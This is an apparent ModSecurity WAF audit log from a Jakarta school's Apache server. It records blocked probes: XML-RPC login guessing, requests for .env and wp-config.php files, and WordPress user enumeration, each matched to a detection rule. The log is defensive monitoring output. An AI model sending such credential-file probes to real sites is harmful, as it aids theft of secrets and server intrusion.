proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288838607251 4712 (- - -) Stopwatch2: 1749288838607251 4712; combined=3124, p1=374, p2=2595, p3=0, p4=0, p5=91, sr=82, sw=64, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --65cd5017-Z-- --3f60ff71-A-- [07/Jun/2025:16:34:54 +0700] aEQHvpANhDjQAvBdMyH7yQAAAJY 103.236.140.4 50734 103.236.140.4 8181 --3f60ff71-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.43.73.90 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.43.73.90 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --3f60ff71-C-- wp.getUsersBlogs timkreatif bubbles --3f60ff71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f60ff71-E-- --3f60ff71-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (120+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749288894380902 5777 (- - -) Stopwatch2: 1749288894380902 5777; combined=4029, p1=496, p2=3315, p3=0, p4=0, p5=127, sr=86, sw=91, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f60ff71-Z-- --53e90277-A-- [07/Jun/2025:16:37:46 +0700] aEQIahK9gc79coX6mHSsqwAAAEY 103.236.140.4 56924 103.236.140.4 8181 --53e90277-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; ONEPLUS A5010) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --53e90277-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e90277-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749289066448041 829 (- - -) Stopwatch2: 1749289066448041 829; combined=351, p1=305, p2=0, p3=0, p4=0, p5=46, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e90277-Z-- --275edb72-A-- [07/Jun/2025:17:02:38 +0700] aEQOPpANhDjQAvBdMyEChQAAAJE 103.236.140.4 56498 103.236.140.4 8181 --275edb72-B-- GET /.docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept-Charset: utf-8 --275edb72-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --275edb72-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749290558816236 827 (- - -) Stopwatch2: 1749290558816236 827; combined=314, p1=276, p2=0, p3=0, p4=0, p5=37, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --275edb72-Z-- --8e8b9524-A-- [07/Jun/2025:17:09:07 +0700] aEQPwxK9gc79coX6mHS0ugAAAEY 103.236.140.4 58670 103.236.140.4 8181 --8e8b9524-B-- GET /.env HTTP/1.0 Host: ns1.dwitekno.co.id X-Real-IP: 194.0.234.149 X-Forwarded-Host: ns1.dwitekno.co.id X-Forwarded-Server: ns1.dwitekno.co.id X-Forwarded-For: 194.0.234.149 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 zgrab/0.x Accept: */* --8e8b9524-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e8b9524-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749290947510316 831 (- - -) Stopwatch2: 1749290947510316 831; combined=321, p1=281, p2=0, p3=0, p4=0, p5=39, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e8b9524-Z-- --b21aeb26-A-- [07/Jun/2025:17:30:25 +0700] aEQUwRK9gc79coX6mHS1UAAAAFg 103.236.140.4 59242 103.236.140.4 8181 --b21aeb26-B-- GET /public/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36 Accept-Charset: utf-8 --b21aeb26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b21aeb26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749292225310907 787 (- - -) Stopwatch2: 1749292225310907 787; combined=309, p1=270, p2=0, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b21aeb26-Z-- --8dd9032e-A-- [07/Jun/2025:17:33:31 +0700] aEQVe_ClubEPOra_8Uk1ZQAAABY 103.236.140.4 59258 103.236.140.4 8181 --8dd9032e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Android; Opera Mini/7.6.40234/151.113; U; en) Presto/2.12.423 Version/12.16 Accept-Charset: utf-8 --8dd9032e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8dd9032e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749292411155864 839 (- - -) Stopwatch2: 1749292411155864 839; combined=314, p1=273, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8dd9032e-Z-- --f4ec622a-A-- [07/Jun/2025:17:33:37 +0700] aEQVgfClubEPOra_8Uk1ZwAAABE 103.236.140.4 59264 103.236.140.4 8181 --f4ec622a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3676.400 QQBrowser/10.4.3469.400 Accept-Charset: utf-8 --f4ec622a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4ec622a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749292417424196 818 (- - -) Stopwatch2: 1749292417424196 818; combined=313, p1=274, p2=0, p3=0, p4=0, p5=38, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4ec622a-Z-- --567a4059-A-- [07/Jun/2025:18:20:55 +0700] aEQgl2COO9DrcKL2J_4n2QAAAM8 103.236.140.4 59432 103.236.140.4 8181 --567a4059-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.148.25.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.148.25.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --567a4059-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --567a4059-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749295255573911 3637 (- - -) Stopwatch2: 1749295255573911 3637; combined=1554, p1=514, p2=999, p3=0, p4=0, p5=41, sr=100, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --567a4059-Z-- --f5659759-A-- [07/Jun/2025:18:58:19 +0700] aEQpWxK9gc79coX6mHS1vAAAAFA 103.236.140.4 59806 103.236.140.4 8181 --f5659759-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 159.65.15.81 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Accept: */* User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force Cookie: X-Forwarded-For: 159.65.15.81 Accept-Encoding: gzip X-Varnish: 174949853 --f5659759-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f5659759-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749297499938253 862 (- - -) Stopwatch2: 1749297499938253 862; combined=335, p1=296, p2=0, p3=0, p4=0, p5=39, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5659759-Z-- --f7f72c24-A-- [07/Jun/2025:19:13:31 +0700] aEQs6xK9gc79coX6mHS2EQAAAEs 103.236.140.4 60362 103.236.140.4 8181 --f7f72c24-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.236.163.211 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.236.163.211 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f7f72c24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7f72c24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749298411113545 2831 (- - -) Stopwatch2: 1749298411113545 2831; combined=1274, p1=427, p2=817, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7f72c24-Z-- --9573e25a-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BmCOO9DrcKL2J_4oPAAAAMs 103.236.140.4 32906 103.236.140.4 8181 --9573e25a-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9573e25a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9573e25a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766040461 851 (- - -) Stopwatch2: 1749301766040461 851; combined=302, p1=262, p2=0, p3=0, p4=0, p5=39, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9573e25a-Z-- --9a22060d-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BvClubEPOra_8Uk14QAAABg 103.236.140.4 32908 103.236.140.4 8181 --9a22060d-B-- GET /.env.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9a22060d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9a22060d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766223037 709 (- - -) Stopwatch2: 1749301766223037 709; combined=282, p1=246, p2=0, p3=0, p4=0, p5=36, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9a22060d-Z-- --9db00e74-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BhK9gc79coX6mHS2sQAAAEQ 103.236.140.4 32910 103.236.140.4 8181 --9db00e74-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --9db00e74-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9db00e74-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766406240 675 (- - -) Stopwatch2: 1749301766406240 675; combined=254, p1=221, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9db00e74-Z-- --2e477f2e-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BpANhDjQAvBdMyEDTQAAAIA 103.236.140.4 32912 103.236.140.4 8181 --2e477f2e-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --2e477f2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e477f2e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766588717 20445 (- - -) Stopwatch2: 1749301766588717 20445; combined=39720, p1=219, p2=0, p3=0, p4=0, p5=19768, sr=64, sw=0, l=0, gc=19733 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e477f2e-Z-- --a2cdb908-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BvClubEPOra_8Uk14gAAAAY 103.236.140.4 32914 103.236.140.4 8181 --a2cdb908-B-- GET /.env.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a2cdb908-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a2cdb908-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766771170 841 (- - -) Stopwatch2: 1749301766771170 841; combined=304, p1=262, p2=0, p3=0, p4=0, p5=41, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a2cdb908-Z-- --4c5e5364-A-- [07/Jun/2025:20:09:26 +0700] aEQ6BmCOO9DrcKL2J_4oPQAAANg 103.236.140.4 32916 103.236.140.4 8181 --4c5e5364-B-- GET /.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --4c5e5364-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c5e5364-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301766953880 913 (- - -) Stopwatch2: 1749301766953880 913; combined=342, p1=296, p2=0, p3=0, p4=0, p5=46, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c5e5364-Z-- --a68e4f1d-A-- [07/Jun/2025:20:09:40 +0700] aEQ6FPClubEPOra_8Uk15AAAAAE 103.236.140.4 32922 103.236.140.4 8181 --a68e4f1d-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a68e4f1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a68e4f1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301780534763 786 (- - -) Stopwatch2: 1749301780534763 786; combined=305, p1=265, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a68e4f1d-Z-- --16f5665c-A-- [07/Jun/2025:20:09:42 +0700] aEQ6FvClubEPOra_8Uk17gAAAAc 103.236.140.4 32942 103.236.140.4 8181 --16f5665c-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --16f5665c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16f5665c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749301782421052 728 (- - -) Stopwatch2: 1749301782421052 728; combined=299, p1=258, p2=0, p3=0, p4=0, p5=40, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16f5665c-Z-- --3ca8d239-A-- [07/Jun/2025:20:09:43 +0700] aEQ6F_ClubEPOra_8Uk19QAAAAA 103.236.140.4 32956 103.236.140.4 8181 --3ca8d239-B-- GET /wp-config.php.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.204 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.204 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --3ca8d239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ca8d239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at 